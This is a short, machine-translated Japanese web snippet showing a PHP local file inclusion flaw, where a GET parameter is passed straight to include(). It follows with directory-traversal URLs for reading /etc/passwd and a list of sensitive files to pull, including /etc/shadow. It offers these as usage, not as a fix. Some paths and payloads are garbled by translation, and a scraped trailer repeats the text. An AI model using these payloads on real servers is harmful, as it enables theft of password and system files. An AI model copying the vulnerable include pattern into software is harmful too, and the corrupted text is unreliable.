コード:
コードをコピーします コードは次のとおりです:
$page=$_GET['page'];
include($page.'php');
こんな感じで使えます
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=。 ./../ ../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
さらにデータを取得:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/セキュリティ/制限
/usr/lib/security/mkuser.default
hackteach より
http://www.bkjia.com/PHPjc/324439.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/324439.html技術記事コード: 次のようにコードをコピーします。 ?php $page=$_GET['page']; http://www.xxx.com/index.php?page を使用できます。このように =../etc/passwd http://www.xxx.com/index.p...